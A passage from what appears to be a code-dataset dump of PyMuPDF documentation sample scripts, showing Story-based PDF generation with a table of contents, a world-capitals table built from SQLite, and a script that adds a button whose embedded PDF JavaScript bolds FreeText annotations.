            ret += f"    <li>page={position.page_num}\n"
            ret += f"    <li>depth={position.depth}\n"
            ret += f"    <li>heading={position.heading}\n"
            ret += f"    <li>id={position.id!r}\n"
            ret += f"    <li>href={position.href!r}\n"
            ret += f"    <li>rect={position.rect}\n"
            ret += f"    <li>text={text!r}\n"
            ret += f"    <li>open_close={position.open_close}\n"
            ret += f"    </ul>\n"
    ret += '</ul>\n'
    # Main content.
    ret += textwrap.dedent('''
        <h1>First section</h1>
        <p>Contents of first section.
        <ul>
        <li>External <a href="https://artifex.com/">link to https://artifex.com/</a>.
        <li><a href="#idtest">Link to IDTEST</a>.
        <li><a href="#nametest">Link to NAMETEST</a>.
        </ul>
        <h1>Second section</h1>
        <p>Contents of second section.
        <h2>Second section first subsection</h2>
        <p>Contents of second section first subsection.
        <p id="idtest">IDTEST
        <h1>Third section</h1>
        <p>Contents of third section.
        <p><a name="nametest">NAMETEST</a>.
        </body>
        ''')
    ret = ret.strip()
    # keep a copy of the generated HTML next to the script for debugging
    with open(__file__.replace('.py', '.html'), 'w') as f:
        f.write(ret)
    return ret
out_path = __file__.replace('.py', '.pdf')  # output PDF next to this script
# iterate layout until the TOC page numbers are stable, producing a Document
document = pymupdf.Story.write_stabilized_with_links(contentfn, rectfn)
document.save(out_path)
| 2,923 | Python | .py | 73 | 30.369863 | 89 | 0.540628 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,314 | story-write-stabilized.py | pymupdf_PyMuPDF/docs/samples/story-write-stabilized.py | """
Demo script for PyMuPDF's `pymupdf.Story.write_stabilized()`.
`pymupdf.Story.write_stabilized()` is similar to `pymupdf.Story.write()`,
except instead of taking a fixed html document, it does iterative layout
of dynamically-generated html content (provided by a callback) to a
`pymupdf.DocumentWriter`.
For example this allows one to add a dynamically-generated table of contents
section while ensuring that page numbers are patched up until stable.
"""
import textwrap
import pymupdf
def rectfn(rect_num, filled):
    '''
    We return one rect per page.
    Both arguments are ignored: every page uses the same fixed geometry.
    The result is (mediabox, fill-rectangle, None) - the third element is
    always None here.
    '''
    rect = pymupdf.Rect(10, 20, 290, 380)
    mediabox = pymupdf.Rect(0, 0, 300, 400)
    #print(f'rectfn(): rect_num={rect_num} filled={filled}')
    return mediabox, rect, None
def contentfn(positions):
    '''
    Build the document HTML, prepending a table of contents derived
    from `positions`, and dump a copy of it next to this script.
    '''
    parts = []
    parts.append(textwrap.dedent('''
        <!DOCTYPE html>
        <body>
        <h2>Contents</h2>
        <ul>
        '''))
    # One TOC entry (with detail sub-list) per heading "open" record.
    for pos in positions:
        if not (pos.heading and (pos.open_close & 1)):
            continue
        text = pos.text if pos.text else ''
        if pos.id:
            parts.append(f"    <li><a href=\"#{pos.id}\">{text}</a>\n")
        else:
            parts.append(f"    <li>{text}\n")
        parts.append(f"    <ul>\n")
        parts.append(f"    <li>page={pos.page_num}\n")
        parts.append(f"    <li>depth={pos.depth}\n")
        parts.append(f"    <li>heading={pos.heading}\n")
        parts.append(f"    <li>id={pos.id!r}\n")
        parts.append(f"    <li>href={pos.href!r}\n")
        parts.append(f"    <li>rect={pos.rect}\n")
        parts.append(f"    <li>text={text!r}\n")
        parts.append(f"    <li>open_close={pos.open_close}\n")
        parts.append(f"    </ul>\n")
    parts.append('</ul>\n')
    # Main content.
    parts.append(textwrap.dedent('''
        <h1>First section</h1>
        <p>Contents of first section.
        <h1>Second section</h1>
        <p>Contents of second section.
        <h2>Second section first subsection</h2>
        <p>Contents of second section first subsection.
        <h1>Third section</h1>
        <p>Contents of third section.
        </body>
        '''))
    html = ''.join(parts).strip()
    # keep a copy of the generated HTML next to the script for debugging
    with open(__file__.replace('.py', '.html'), 'w') as f:
        f.write(html)
    return html
out_path = __file__.replace('.py', '.pdf')  # output PDF next to this script
writer = pymupdf.DocumentWriter(out_path)
# iterate layout until the TOC page numbers are stable, writing to `writer`
pymupdf.Story.write_stabilized(writer, contentfn, rectfn)
writer.close()  # finalize the PDF file
| 2,783 | Python | .py | 70 | 30.9 | 76 | 0.567085 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,315 | national-capitals.py | pymupdf_PyMuPDF/docs/samples/national-capitals.py | """
Demo script using (Py-) MuPDF "Story" feature.
The following features are implemented:
* Use of Story "template" feature to provide row content
* Use database access (SQLITE) to fetch row content
* Use ElementPosition feature to locate cell positions on page
* Simulate feature "Table Header Repeat"
* Simulate feature "Cell Grid Lines"
"""
import io
import sqlite3
import sys
import pymupdf
"""
Table data. Used to populate a temporary SQL database, which will be processed by the script.
Its only purpose is to avoid carrying around a separate database file.
"""
table_data = """China;Beijing;21542000;1.5%;2018
Japan;Tokyo;13921000;11.2%;2019
DR Congo;Kinshasa;12691000;13.2%;2017
Russia;Moscow;12655050;8.7%;2021
Indonesia;Jakarta;10562088;3.9%;2020
Egypt;Cairo;10107125;9.3%;2022
South Korea;Seoul;9508451;18.3%;2022
Mexico;Mexico City;9209944;7.3%;2020
United Kingdom;London;9002488;13.4%;2020
Bangladesh;Dhaka;8906039;5.3%;2011
Peru;Lima;8852000;26.3%;2012
Iran;Tehran;8693706;9.9%;2016
Thailand;Bangkok;8305218;11.6%;2010
Vietnam;Hanoi;8053663;8.3%;2019
Iraq;Baghdad;7682136;17.6%;2021
Saudi Arabia;Riyadh;7676654;21.4%;2018
Hong Kong;Hong Kong;7291600;100%;2022
Colombia;Bogotá;7181469;13.9%;2011
Chile;Santiago;6310000;32.4%;2012
Turkey;Ankara;5747325;6.8%;2021
Singapore;Singapore;5453600;91.8%;2021
Afghanistan;Kabul;4601789;11.5%;2021
Kenya;Nairobi;4397073;8.3%;2019
Jordan;Amman;4061150;36.4%;2021
Algeria;Algiers;3915811;8.9%;2011
Germany;Berlin;3677472;4.4%;2021
Spain;Madrid;3305408;7.0%;2021
Ethiopia;Addis Ababa;3040740;2.5%;2012
Kuwait;Kuwait City;2989000;70.3%;2018
Guatemala;Guatemala City;2934841;16.7%;2020
South Africa;Pretoria;2921488;4.9%;2011
Ukraine;Kyiv;2920873;6.7%;2021
Argentina;Buenos Aires;2891082;6.4%;2010
North Korea;Pyongyang;2870000;11.1%;2016
Uzbekistan;Tashkent;2860600;8.4%;2022
Italy;Rome;2761632;4.7%;2022
Ecuador;Quito;2800388;15.7%;2020
Cameroon;Yaoundé;2765568;10.2%;2015
Zambia;Lusaka;2731696;14.0%;2020
Sudan;Khartoum;2682431;5.9%;2012
Brazil;Brasília;2648532;1.2%;2012
Taiwan;Taipei (de facto);2608332;10.9%;2020
Yemen;Sanaa;2575347;7.8%;2012
Angola;Luanda;2571861;7.5%;2020
Burkina Faso;Ouagadougou;2453496;11.1%;2019
Ghana;Accra;2388000;7.3%;2017
Somalia;Mogadishu;2388000;14.0%;2021
Azerbaijan;Baku;2303100;22.3%;2022
Cambodia;Phnom Penh;2281951;13.8%;2019
Venezuela;Caracas;2245744;8.0%;2016
France;Paris;2139907;3.3%;2022
Cuba;Havana;2132183;18.9%;2020
Zimbabwe;Harare;2123132;13.3%;2012
Syria;Damascus;2079000;9.7%;2019
Belarus;Minsk;1996553;20.8%;2022
Austria;Vienna;1962779;22.0%;2022
Poland;Warsaw;1863056;4.9%;2021
Philippines;Manila;1846513;1.6%;2020
Mali;Bamako;1809106;8.3%;2009
Malaysia;Kuala Lumpur;1782500;5.3%;2019
Romania;Bucharest;1716983;8.9%;2021
Hungary;Budapest;1706851;17.6%;2022
Congo;Brazzaville;1696392;29.1%;2015
Serbia;Belgrade;1688667;23.1%;2021
Uganda;Kampala;1680600;3.7%;2019
Guinea;Conakry;1660973;12.3%;2014
Mongolia;Ulaanbaatar;1466125;43.8%;2020
Honduras;Tegucigalpa;1444085;14.0%;2021
Senegal;Dakar;1438725;8.5%;2021
Niger;Niamey;1334984;5.3%;2020
Uruguay;Montevideo;1319108;38.5%;2011
Bulgaria;Sofia;1307439;19.0%;2021
Oman;Muscat;1294101;28.6%;2021
Czech Republic;Prague;1275406;12.1%;2022
Madagascar;Antananarivo;1275207;4.4%;2018
Kazakhstan;Astana;1239900;6.5%;2022
Nigeria;Abuja;1235880;0.6%;2011
Georgia;Tbilisi;1201769;32.0%;2022
Mauritania;Nouakchott;1195600;25.9%;2019
Qatar;Doha;1186023;44.1%;2020
Libya;Tripoli;1170000;17.4%;2019
Myanmar;Naypyidaw;1160242;2.2%;2014
Rwanda;Kigali;1132686;8.4%;2012
Mozambique;Maputo;1124988;3.5%;2020
Dominican Republic;Santo Domingo;1111838;10.0%;2010
Armenia;Yerevan;1096100;39.3%;2021
Kyrgyzstan;Bishkek;1074075;16.5%;2021
Sierra Leone;Freetown;1055964;12.5%;2015
Nicaragua;Managua;1055247;15.4%;2020
Canada;Ottawa;1017449;2.7%;2021
Pakistan;Islamabad;1014825;0.4%;2017
Liberia;Monrovia;1010970;19.5%;2008
United Arab Emirates;Abu Dhabi;1010092;10.8%;2020
Malawi;Lilongwe;989318;5.0%;2018
Haiti;Port-au-Prince;987310;8.6%;2015
Sweden;Stockholm;978770;9.4%;2021
Eritrea;Asmara;963000;26.6%;2020
Israel;Jerusalem;936425;10.5%;2019
Laos;Vientiane;927724;12.5%;2019
Chad;N'Djamena;916000;5.3%;2009
Netherlands;Amsterdam;905234;5.2%;2022
Central African Republic;Bangui;889231;16.3%;2020
Panama;Panama City;880691;20.2%;2013
Tajikistan;Dushanbe;863400;8.9%;2020
Nepal;Kathmandu;845767;2.8%;2021
Togo;Lomé;837437;9.7%;2010
Turkmenistan;Ashgabat;791000;12.5%;2017
Moldova;Chişinău;779300;25.5%;2019
Croatia;Zagreb;769944;19.0%;2021
Gabon;Libreville;703904;30.1%;2013
Norway;Oslo;697010;12.9%;2021
Macau;Macau;671900;97.9%;2022
United States;Washington D.C.;670050;0.2%;2021
Jamaica;Kingston;662491;23.4%;2019
Finland;Helsinki;658864;11.9%;2021
Tunisia;Tunis;638845;5.2%;2014
Denmark;Copenhagen;638117;10.9%;2021
Greece;Athens;637798;6.1%;2021
Latvia;Riga;605802;32.3%;2021
Djibouti;Djibouti (city);604013;54.6%;2012
Ireland;Dublin;588233;11.8%;2022
Morocco;Rabat;577827;1.6%;2014
Lithuania;Vilnius;576195;20.7%;2022
El Salvador;San Salvador;570459;9.0%;2019
Albania;Tirana;557422;19.5%;2011
North Macedonia;Skopje;544086;25.9%;2015
South Sudan;Juba;525953;4.9%;2017
Paraguay;Asunción;521559;7.8%;2020
Portugal;Lisbon;509614;5.0%;2020
Guinea-Bissau;Bissau;492004;23.9%;2015
Slovakia;Bratislava;440948;8.1%;2020
Estonia;Tallinn;438341;33.0%;2021
Australia;Canberra;431380;1.7%;2020
Namibia;Windhoek;431000;17.0%;2020
Tanzania;Dodoma;410956;0.6%;2012
Papua New Guinea;Port Moresby;364145;3.7%;2011
Ivory Coast;Yamoussoukro;361893;1.3%;2020
Lebanon;Beirut;361366;6.5%;2014
Bolivia;Sucre;360544;3.0%;2022
Puerto Rico (US);San Juan;342259;10.5%;2020
Costa Rica;San José;342188;6.6%;2018
Lesotho;Maseru;330760;14.5%;2016
Cyprus;Nicosia;326739;26.3%;2016
Equatorial Guinea;Malabo;297000;18.2%;2018
Slovenia;Ljubljana;285604;13.5%;2021
East Timor;Dili;277279;21.0%;2015
Bosnia and Herzegovina;Sarajevo;275524;8.4%;2013
Bahamas;Nassau;274400;67.3%;2016
Botswana;Gaborone;273602;10.6%;2020
Benin;Porto-Novo;264320;2.0%;2013
Suriname;Paramaribo;240924;39.3%;2012
India;New Delhi;249998;0.0%;2011
Sahrawi Arab Democratic Republic;Laayoune (claimed) - Tifariti (de facto);217732 - 3000;—;2014
New Zealand;Wellington;217000;4.2%;2021
Bahrain;Manama;200000;13.7%;2020
Kosovo;Pristina;198897;12.0%;2011
Montenegro;Podgorica;190488;30.3%;2020
Belgium;Brussels;187686;1.6%;2022
Cape Verde;Praia;159050;27.1%;2017
Mauritius;Port Louis;147066;11.3%;2018
Curaçao (Netherlands);Willemstad;136660;71.8%;2011
Burundi;Gitega;135467;1.1%;2020
Switzerland;Bern (de facto);134591;1.5%;2020
Transnistria;Tiraspol;133807;38.5%;2015
Maldives;Malé;133412;25.6%;2014
Iceland;Reykjavík;133262;36.0%;2021
Luxembourg;Luxembourg City;124509;19.5%;2021
Guyana;Georgetown;118363;14.7%;2012
Bhutan;Thimphu;114551;14.7%;2017
Comoros;Moroni;111326;13.5%;2016
Barbados;Bridgetown;110000;39.1%;2014
Sri Lanka;Sri Jayawardenepura Kotte;107925;0.5%;2012
Brunei;Bandar Seri Begawan;100700;22.6%;2007
Eswatini;Mbabane;94874;8.0%;2010
New Caledonia (France);Nouméa;94285;32.8%;2019
Fiji;Suva;93970;10.2%;2017
Solomon Islands;Honiara;92344;13.0%;2021
Republic of Artsakh;Stepanakert;75000;62.5%;2021
Gambia;Banjul;73000;2.8%;2013
São Tomé and Príncipe;São Tomé;71868;32.2%;2015
Kiribati;Tarawa;70480;54.7%;2020
Vanuatu;Port Vila;51437;16.1%;2016
Northern Mariana Islands (USA);Saipan;47565;96.1%;2017
Samoa;Apia;41611;19.0%;2021
Palestine;Ramallah (de facto);38998;0.8%;2017
Monaco;Monaco;38350;104.5%;2020
Jersey (UK);Saint Helier;37540;34.2%;2018
Trinidad and Tobago;Port of Spain;37074;2.4%;2011
Cayman Islands (UK);George Town;34399;50.5%;2021
Gibraltar (UK);Gibraltar;34003;104.1%;2020
Grenada;St. George's;33734;27.1%;2012
Aruba (Netherlands);Oranjestad;28294;26.6%;2010
Isle of Man (UK);Douglas;27938;33.2%;2011
Marshall Islands;Majuro;27797;66.1%;2011
Tonga;Nukuʻalofa;27600;26.0%;2022
Seychelles;Victoria;26450;24.8%;2010
French Polynesia (France);Papeete;26926;8.9%;2017
Andorra;Andorra la Vella;22873;28.9%;2022
Faroe Islands (Denmark);Tórshavn;22738;43.0%;2022
Antigua and Barbuda;St. John's;22219;23.8%;2011
Belize;Belmopan;20621;5.2%;2016
Saint Lucia;Castries;20000;11.1%;2013
Guernsey (UK);Saint Peter Port;18958;30.1%;2019
Greenland (Denmark);Nuuk;18800;33.4%;2021
Dominica;Roseau;14725;20.3%;2011
Saint Kitts and Nevis;Basseterre;14000;29.4%;2018
Saint Vincent and the Grenadines;Kingstown;12909;12.4%;2012
British Virgin Islands (UK);Road Town;12603;40.5%;2012
Åland (Finland);Mariehamn;11736;39.0%;2021
U.S. Virgin Islands (US);Charlotte Amalie;14477;14.5%;2020
Micronesia;Palikir;6647;5.9%;2010
Tuvalu;Funafuti;6320;56.4%;2017
Malta;Valletta;5827;1.1%;2019
Liechtenstein;Vaduz;5774;14.8%;2021
Saint Pierre and Miquelon (France);Saint-Pierre;5394;91.7%;2019
Cook Islands (NZ);Avarua;4906;28.9%;2016
San Marino;City of San Marino;4061;12.0%;2021
Turks and Caicos Islands (UK);Cockburn Town;3720;8.2%;2016
American Samoa (USA);Pago Pago;3656;8.1%;2010
Saint Martin (France);Marigot;3229;10.1%;2017
Saint Barthélemy (France);Gustavia;2615;24.1%;2010
Falkland Islands (UK);Stanley;2460;65.4%;2016
Svalbard (Norway);Longyearbyen;2417;82.2%;2020
Sint Maarten (Netherlands);Philipsburg;1894;4.3%;2011
Christmas Island (Australia);Flying Fish Cove;1599;86.8%;2016
Anguilla (UK);The Valley;1067;6.8%;2011
Guam (US);Hagåtña;1051;0.6%;2010
Wallis and Futuna (France);Mata Utu;1029;8.9%;2018
Bermuda (UK);Hamilton;854;1.3%;2016
Nauru;Yaren (de facto);747;6.0%;2011
Saint Helena (UK);Jamestown;629;11.6%;2016
Niue (NZ);Alofi;597;30.8%;2017
Tokelau (NZ);Atafu;541;29.3%;2016
Vatican City;Vatican City (city-state);453;100%;2019
Montserrat (UK);Brades (de facto) - Plymouth (de jure);449 - 0;-;2011
Norfolk Island (Australia);Kingston;341;-;2015
Palau;Ngerulmud;271;1.5%;2010
Cocos (Keeling) Islands (Australia);West Island;134;24.6%;2011
Pitcairn Islands (UK);Adamstown;40;100.0%;2021
South Georgia and the South Sandwich Islands (UK);King Edward Point;22;73.3%;2018"""
# -------------------------------------------------------------------
# HTML template for the report. We define no table header <th> items
# because this is done in post processing.
# The actual template part is the table row, identified by id "row".
# The content of each cell will be filled using the respective id.
# -------------------------------------------------------------------
HTML = """
<h1 style="text-align:center">World Capital Cities</h1>
<p><i>Percent "%" is city population as a percentage of the country, as of "Year".</i>
</p><p></p>
<table>
<tr id="row">
<td id="country"></td>
<td id="capital"></td>
<td id="population"></td>
<td id="percent"></td>
<td id="year"></td>
</tr>
</table>
"""
# -------------------------------------------------------------------
# Sets font-family globally to sans-serif, and text-align to right
# for the numerical table columns.
# -------------------------------------------------------------------
CSS = """
body {
font-family: sans-serif;
}
td[id="population"], td[id="percent"], td[id="year"] {
text-align: right;
padding-right: 2px;
}"""
# -------------------------------------------------------------------
# recorder function for cell positions
# -------------------------------------------------------------------
coords = {} # stores cell gridline coordinates
def recorder(elpos):
    """Record table row / cell geometry per page in the global ``coords``.

    For every page, ``coords[page]`` holds a 4-tuple:
    (set of cell left borders, set of row bottom borders,
     right-most cell border, top-most cell border).
    """
    # Only "close" events carry the final geometry of an element.
    if elpos.open_close != 2:
        return
    # Restrict attention to the table row and its five cells.
    if elpos.id not in ("row", "country", "capital", "population", "percent", "year"):
        return
    cell = pymupdf.Rect(elpos.rect)
    # Ignore anything rendered below the filled rectangle.
    if cell.y1 > elpos.filled:
        return
    lefts, bottoms, right_max, top_min = coords.get(
        elpos.page, (set(), set(), 0, sys.maxsize)
    )
    if elpos.id == "row":
        bottoms.add(cell.y1)  # row bottom border
        top_min = min(top_min, cell.y0)  # top-most border on page
    else:
        lefts.add(cell.x0)  # cell left border
        right_max = max(right_max, cell.x1)  # right-most border on page
    coords[elpos.page] = (lefts, bottoms, right_max, top_min)
# -------------------------------------------------------------------
# define database access: make an intermediate memory database for
# our demo purposes.
# -------------------------------------------------------------------
dbfilename = ":memory:" # the SQLITE database file name
database = sqlite3.connect(dbfilename) # open database
cursor = database.cursor() # multi-purpose database cursor
# Define and fill the SQLITE database
cursor.execute(
"""CREATE TABLE capitals (Country text, Capital text, Population text, Percent text, Year text)"""
)
for value in table_data.splitlines():
cursor.execute("INSERT INTO capitals VALUES (?,?,?,?,?)", value.split(";"))
# select statement for the rows - let SQL also sort it for us
select = """SELECT * FROM capitals ORDER BY "Country" """
# -------------------------------------------------------------------
# define the HTML Story and fill it with database data
# -------------------------------------------------------------------
# Build the Story and populate one table row per database row by cloning
# the HTML template row.
story = pymupdf.Story(HTML, user_css=CSS)
body = story.body # access the HTML body detail
template = body.find(None, "id", "row") # find the template part
table = body.find("table", None, None) # find start of table
# read the rows from the database and put them all in one Python list
# NOTE: instead, we might fetch rows one by one (advisable for large volumes)
cursor.execute(select) # execute cursor, and ...
rows = cursor.fetchall() # read out what was found
database.close() # no longer needed
for country, capital, population, percent, year in rows: # iterate through the rows
    row = template.clone() # clone the template to report each row
    row.find(None, "id", "country").add_text(country)
    row.find(None, "id", "capital").add_text(capital)
    row.find(None, "id", "population").add_text(population)
    row.find(None, "id", "percent").add_text(percent)
    row.find(None, "id", "year").add_text(year)
    table.append_child(row) # append the filled clone to the table
template.remove() # remove the template - it must not appear in the output
# -------------------------------------------------------------------
# generate the PDF and write it to memory
# -------------------------------------------------------------------
# Lay the story out page by page into a memory PDF. Cell positions of
# every page are captured via "recorder" for later post-processing.
fp = io.BytesIO()
writer = pymupdf.DocumentWriter(fp)
mediabox = pymupdf.paper_rect("letter") # use pages in Letter format
where = mediabox + (36, 36, -36, -72) # leave page borders
more = True # story.place() sets this to False once all content is placed
page = 0 # current page number (0-based)
while more:
    dev = writer.begin_page(mediabox) # make a new page
    if page > 0: # leave room above the cells for inserting header row
        delta = (0, 20, 0, 0)
    else: # page 0 starts with the <h1> title - no extra room needed
        delta = (0, 0, 0, 0)
    more, filled = story.place(where + delta) # arrange content on this rectangle
    # record cell rectangles of this page; recorder ignores rects below where.y1
    story.element_positions(recorder, {"page": page, "filled": where.y1})
    story.draw(dev) # write content to page
    writer.end_page() # finish the page
    page += 1
writer.close() # close the PDF
# -------------------------------------------------------------------
# re-open memory PDF for inserting gridlines and header rows
# -------------------------------------------------------------------
# Re-open the memory PDF and decorate each page: cell grid lines,
# alternating row shading, a repeated header row, and a page footer -
# all based on the coordinates collected by "recorder" during layout.
doc = pymupdf.open("pdf", fp)
for page in doc:
    page.wrap_contents() # ensure all "cm" commands are properly wrapped
    x, y, x1, y0 = coords[page.number] # read coordinates of the page
    x = sorted(list(x)) + [x1] # list of cell left-right borders
    y = [y0] + sorted(list(y)) # list of cell top-bottom borders
    shape = page.new_shape() # make a canvas to draw upon
    for item in y: # draw horizontal lines (one under each row)
        shape.draw_line((x[0] - 2, item), (x[-1] + 2, item))
    for i in range(len(y)): # alternating row coloring
        if i % 2: # every second row gets a rect (filled in shape.finish below)
            rect = (x[0] - 2, y[i - 1], x[-1] + 2, y[i])
            shape.draw_rect(rect)
    for i in range(len(x)): # draw vertical lines
        d = 2 if i == len(x) - 1 else -2 # shift left of columns, right of table edge
        shape.draw_line((x[i] + d, y[0]), (x[i] + d, y[-1]))
    # Write header row above table content (simulated "header repeat")
    y0 -= 5 # bottom coord for header row text
    shape.insert_text((x[0], y0), "Country", fontname="hebo", fontsize=12)
    shape.insert_text((x[1], y0), "Capital", fontname="hebo", fontsize=12)
    shape.insert_text((x[2], y0), "Population", fontname="hebo", fontsize=12)
    shape.insert_text((x[3], y0), " %", fontname="hebo", fontsize=12)
    shape.insert_text((x[4], y0), "Year", fontname="hebo", fontsize=12)
    # Write page footer
    y0 = page.rect.height - 50 # top coordinate of footer bbox
    bbox = pymupdf.Rect(0, y0, page.rect.width, y0 + 20) # footer bbox
    page.insert_textbox(
        bbox,
        f"World Capital Cities, Page {page.number+1} of {doc.page_count}",
        align=pymupdf.TEXT_ALIGN_CENTER,
    )
    shape.finish(width=0.3, color=0.5, fill=0.9) # rectangles and gray lines
    shape.commit(overlay=False) # put the drawings in background
doc.subset_fonts() # reduce the size of the embedded fonts
doc.save(__file__.replace(".py", ".pdf"), deflate=True, garbage=4, pretty=True)
doc.close()
| 17,442 | Python | .py | 414 | 39.845411 | 102 | 0.704503 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,316 | make-bold.py | pymupdf_PyMuPDF/docs/samples/make-bold.py | """
Problem: Since MuPDF v1.16 a 'Freetext' annotation font is restricted to the
"normal" versions (no bold, no italics) of Times-Roman, Helvetica, Courier.
It is impossible to use PyMuPDF to modify this.
Solution: Using Adobe's JavaScript API, it is possible to manipulate properties
of Freetext annotations. Check out these references:
https://www.adobe.com/content/dam/acom/en/devnet/acrobat/pdfs/js_api_reference.pdf,
or https://www.adobe.com/devnet/acrobat/documentation.html.
Function 'this.getAnnots()' will return all annotations as an array. We loop
over this array to set the properties of the text through the 'richContents'
attribute.
There is no explicit property to set text to bold, but it is possible to set
fontWeight=800 (400 is the normal size) of richContents.
Other attributes, like color, italics, etc. can also be set via richContents.
If we have 'FreeText' annotations created with PyMuPDF, we can make use of this
JavaScript feature to modify the font - thus circumventing the above restriction.
Use PyMuPDF v1.16.12 to create a push button that executes a Javascript
containing the desired code. This is what this program does.
Then open the resulting file with Adobe reader (!).
After clicking on the button, all Freetext annotations will be bold, and the
file can be saved.
If desired, the button can be removed again, using free tools like PyMuPDF or
PDF XChange editor.
Note / Caution:
---------------
The JavaScript will **only** work if the file is opened with Adobe Acrobat reader!
When using other PDF viewers, the reaction is unforeseeable.
"""
import sys
import pymupdf
# this JavaScript will execute when the button is clicked:
jscript = """
var annt = this.getAnnots();
annt.forEach(function (item, index) {
try {
var span = item.richContents;
span.forEach(function (it, dx) {
it.fontWeight = 800;
})
item.richContents = span;
} catch (err) {}
});
app.alert('Done');
"""
i_fn = sys.argv[1] # input file name
o_fn = "bold-" + i_fn # output filename
# NOTE(review): prefixing the whole argument assumes a plain file name -
# a path like "dir/file.pdf" would become "bold-dir/file.pdf". Confirm
# the intended usage before changing.
doc = pymupdf.open(i_fn) # open input
page = doc[0] # get desired page
# ------------------------------------------------
# make a push button for invoking the JavaScript
# ------------------------------------------------
widget = pymupdf.Widget() # create widget
# make it a 'PushButton'
widget.field_type = pymupdf.PDF_WIDGET_TYPE_BUTTON
widget.field_flags = pymupdf.PDF_BTN_FIELD_IS_PUSHBUTTON
widget.rect = pymupdf.Rect(5, 5, 20, 20) # button position (near page top-left)
widget.script = jscript # JavaScript executed when the button is clicked
widget.field_name = "Make bold" # arbitrary name
widget.field_value = "Off" # arbitrary value
widget.fill_color = (0, 0, 1) # make button visible (blue)
annot = page.add_widget(widget) # add the widget to the page
doc.save(o_fn) # output the file
| 2,818 | Python | .py | 62 | 43.403226 | 83 | 0.725118 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,317 | table01.py | pymupdf_PyMuPDF/docs/samples/table01.py | """
Demo script for basic HTML table support in Story objects
Outputs a table with three columns that fits on one Letter page.
The content of each row is filled via the Story's template mechanism.
Column widths and row heights are automatically computed by MuPDF.
Some styling via a CSS source is also demonstrated:
- The table header row has a gray background
- Each cell shows a border at its top
- The Story's body uses the sans-serif font family
- The text of one of the columns is set to blue
Dependencies
-------------
PyMuPDF v1.22.0 or later
"""
import pymupdf
table_text = ( # the content of each table row
(
"Length",
"integer",
"""(Required) The number of bytes from the beginning of the line following the keyword stream to the last byte just before the keyword endstream. (There may be an additional EOL marker, preceding endstream, that is not included in the count and is not logically part of the stream data.) See “Stream Extent,” above, for further discussion.""",
),
(
"Filter",
"name or array",
"""(Optional) The name of a filter to be applied in processing the stream data found between the keywords stream and endstream, or an array of such names. Multiple filters should be specified in the order in which they are to be applied.""",
),
(
"FFilter",
"name or array",
"""(Optional; PDF 1.2) The name of a filter to be applied in processing the data found in the stream's external file, or an array of such names. The same rules apply as for Filter.""",
),
(
"FDecodeParms",
"dictionary or array",
"""(Optional; PDF 1.2) A parameter dictionary, or an array of such dictionaries, used by the filters specified by FFilter. The same rules apply as for DecodeParms.""",
),
(
"DecodeParms",
"dictionary or array",
"""(Optional) A parameter dictionary or an array of such dictionaries, used by the filters specified by Filter. If there is only one filter and that filter has parameters, DecodeParms must be set to the filter's parameter dictionary unless all the filter's parameters have their default values, in which case the DecodeParms entry may be omitted. If there are multiple filters and any of the filters has parameters set to nondefault values, DecodeParms must be an array with one entry for each filter: either the parameter dictionary for that filter, or the null object if that filter has no parameters (or if all of its parameters have their default values). If none of the filters have parameters, or if all their parameters have default values, the DecodeParms entry may be omitted. (See implementation note 7 in Appendix H.)""",
),
(
"DL",
"integer",
"""(Optional; PDF 1.5) A non-negative integer representing the number of bytes in the decoded (defiltered) stream. It can be used to determine, for example, whether enough disk space is available to write a stream to a file.\nThis value should be considered a hint only; for some stream filters, it may not be possible to determine this value precisely.""",
),
(
"F",
"file specification",
"""(Optional; PDF 1.2) The file containing the stream data. If this entry is present, the bytes between stream and endstream are ignored, the filters are specified by FFilter rather than Filter, and the filter parameters are specified by FDecodeParms rather than DecodeParms. However, the Length entry should still specify the number of those bytes. (Usually, there are no bytes and Length is 0.) (See implementation note 46 in Appendix H.)""",
),
)
# Only a minimal HTML source is required to provide the Story's working
HTML = """
<html>
<body><h2>TABLE 3.4 Entries common to all stream dictionaries</h2>
<table>
<tr>
<th>KEY</th><th>TYPE</th><th>VALUE</th>
</tr>
<tr id="row">
<td id="col0"></td><td id="col1"></td><td id="col2"></td>
</tr>
"""
"""
---------------------------------------------------------------------
Just for demo purposes, set:
- header cell background to gray
- text color in col1 to blue
- a border line at the top of all table cells
- all text to the sans-serif font
---------------------------------------------------------------------
"""
CSS = """th {
background-color: #aaa;
}
td[id="col1"] {
color: blue;
}
td, tr {
border: 1px solid black;
border-right-width: 0px;
border-left-width: 0px;
border-bottom-width: 0px;
}
body {
font-family: sans-serif;
}
"""
# Build the Story: duplicate the template row once per entry of table_text,
# fill its three cells, then emit everything page by page.
story = pymupdf.Story(HTML, user_css=CSS) # define the Story
body = story.body # access the HTML <body> of it
template = body.find(None, "id", "row") # find the template with name "row"
parent = template.parent # access its parent i.e., the <table>
for col0, col1, col2 in table_text:
    row = template.clone() # make a clone of the row template
    # add text to each cell in the duplicated row
    row.find(None, "id", "col0").add_text(col0)
    row.find(None, "id", "col1").add_text(col1)
    row.find(None, "id", "col2").add_text(col2)
    parent.append_child(row) # add new row to <table>
template.remove() # remove the template - it must not show in the output
# Story is ready - output it via a writer
writer = pymupdf.DocumentWriter(__file__.replace(".py", ".pdf"), "compress")
mediabox = pymupdf.paper_rect("letter") # size of one output page
where = mediabox + (36, 36, -36, -36) # use this sub-area for the content
more = True # detects end of output
while more:
    dev = writer.begin_page(mediabox) # start a page, returning a device
    more, filled = story.place(where) # compute content fitting into "where"
    story.draw(dev) # output it to the page
    writer.end_page() # finalize the page
writer.close() # close the output
| 5,790 | Python | .py | 112 | 47.660714 | 840 | 0.689686 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,318 | text-lister.py | pymupdf_PyMuPDF/docs/samples/text-lister.py | import sys
import pymupdf
def flags_decomposer(flags):
    """Return a human-readable, comma-separated description of span font flags.

    Bit layout (low to high): superscript, italic, serif, monospace, bold.
    The serif and spacing bits always contribute a word ("serifed"/"sans",
    "monospaced"/"proportional"); the other bits only when set.
    """
    names = []
